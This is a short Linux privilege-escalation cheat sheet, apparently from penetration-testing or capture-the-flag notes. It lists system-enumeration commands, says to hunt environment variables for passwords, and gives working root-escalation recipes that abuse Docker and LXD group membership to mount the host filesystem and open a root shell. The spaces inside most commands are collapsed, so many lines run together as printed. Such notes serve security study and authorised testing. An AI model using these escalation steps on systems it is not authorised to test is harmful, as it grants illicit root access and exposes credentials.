Obtain information about the system architecture, distribution, and kernel version.
uname-a# System informationlsb_release-a# Distribution informationgetconfLONG_BIT# System architecturecat/proc/version# Kernel versioncat/etc/os-release# OS details
Path
Check if you have write permissions for any directory in the PATH.
Sometimes we can find password or sensitive information in environment variables.
env# Environment variablesset# Shell variables
Groups
List all the groups users belongs to.
id [user]groups [user]
Docker
If you belong to the Docker group, you could mount the filesystem within a container and have full access to it, allowing you to modify it.
dockerrun-it--rm-v/:/mntalpinechroot/mntsh
LXD/LXC
Similar to Docker, with LXD/LXC, we can also mount the filesystem within a container, granting full access to it.
# On your machine, download and build an alpine image and transfer it to the hostgitclonehttps://github.com/saghul/lxd-alpine-builder&&cdlxd-alpine-builder&&sudo./build-alpine
# Import the imagelxcimageimport./alpine.tar.gz--aliasprivimg# Initializelxdinit# Create the containterlxcinitprivimgprivcont-csecurity.privileged=true# Mount the filesystemlxcconfigdeviceaddprivcontprivdevdisksource=/path=/mnt/rootrecursive=true# Start the containerlxcstartprivcont# Interactive shelllxcexecprivcont/bin/sh